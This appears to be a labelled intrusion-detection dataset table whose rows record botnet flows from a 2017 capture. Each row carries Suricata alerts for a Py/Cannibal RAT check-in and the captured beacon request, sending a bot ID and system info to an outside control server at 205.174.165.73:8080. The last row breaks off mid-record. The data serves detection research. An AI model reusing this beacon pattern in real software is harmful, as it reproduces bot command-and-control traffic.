Flow ID
string | event_types
string | log
string | alerted
bool | class
string | truth
bool | start
string | age
int64 | Day
string | event_type_alert
string | num_tokens
int64 | label
string | __index_level_0__
int64 |
---|---|---|---|---|---|---|---|---|---|---|---|---|
192.168.10.15-52251-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4437970, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:24:00 | 87,252 | Friday | [{'timestamp': '2017-07-07T13:24:00.373013+0000', 'flow_id': 1161958496689896, 'pcap_cnt': 4437970, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52251, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:00.286440+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobnhAAIAGTqjAqAoPza6lScwbH5CvwShZuXl8b1ARAQB3dAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:24:00.373013+0000', 'flow_id': 1161958496689896, 'pcap_cnt': 4437970, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52251, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:00.286440+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobnhAAIAGTqjAqAoPza6lScwbH5CvwShZuXl8b1ARAQB3dAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,247,404 |
192.168.10.15-52252-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4450079, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:24:10 | 59,493 | Friday | [{'timestamp': '2017-07-07T13:24:10.423247+0000', 'flow_id': 227957729300524, 'pcap_cnt': 4450079, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52252, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:10.364588+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobn1AAIAGTqPAqAoPza6lScwcH5BHirYMrIWAblARAQBa7AAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:24:10.423247+0000', 'flow_id': 227957729300524, 'pcap_cnt': 4450079, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52252, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:10.364588+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobn1AAIAGTqPAqAoPza6lScwcH5BHirYMrIWAblARAQBa7AAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,247,585 |
192.168.10.15-52253-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4450262, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:24:12 | 82,755 | Friday | [{'timestamp': '2017-07-07T13:24:12.556463+0000', 'flow_id': 379677449141452, 'pcap_cnt': 4450262, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52253, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:12.474316+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoboJAAIAGTp7AqAoPza6lScwdH5B0E8UOQ2Lk9VARAQAj/AAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:24:12.556463+0000', 'flow_id': 379677449141452, 'pcap_cnt': 4450262, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52253, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:12.474316+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoboJAAIAGTp7AqAoPza6lScwdH5B0E8UOQ2Lk9VARAQAj/AAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,247,606 |
192.168.10.14-51583-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4455562, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:24:28 | 88,463 | Friday | [{'timestamp': '2017-07-07T13:24:28.898401+0000', 'flow_id': 888085613927991, 'pcap_cnt': 4455562, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51583, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:28.810551+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGHBAAIAGpLHAqAoOza6lScl/H5DrbRw7SWr1AFARAQBCAQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:24:28.898401+0000', 'flow_id': 888085613927991, 'pcap_cnt': 4455562, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51583, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:28.810551+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGHBAAIAGpLHAqAoOza6lScl/H5DrbRw7SWr1AFARAQBCAQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,247,883 |
192.168.10.14-51584-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4458641, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:24:38 | 65,693 | Friday | [{'timestamp': '2017-07-07T13:24:38.964527+0000', 'flow_id': 1017304000674335, 'pcap_cnt': 4458641, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51584, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:38.899615+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGHVAAIAGpKzAqAoOza6lScmAH5AxZ94QOdvDlVARAQB7KwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:24:38.964527+0000', 'flow_id': 1017304000674335, 'pcap_cnt': 4458641, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51584, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:38.899615+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGHVAAIAGpKzAqAoOza6lScmAH5AxZ94QOdvDlVARAQB7KwAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,248,038 |
192.168.10.14-51585-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4460362, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:24:48 | 123,567 | Friday | [{'timestamp': '2017-07-07T13:24:49.089414+0000', 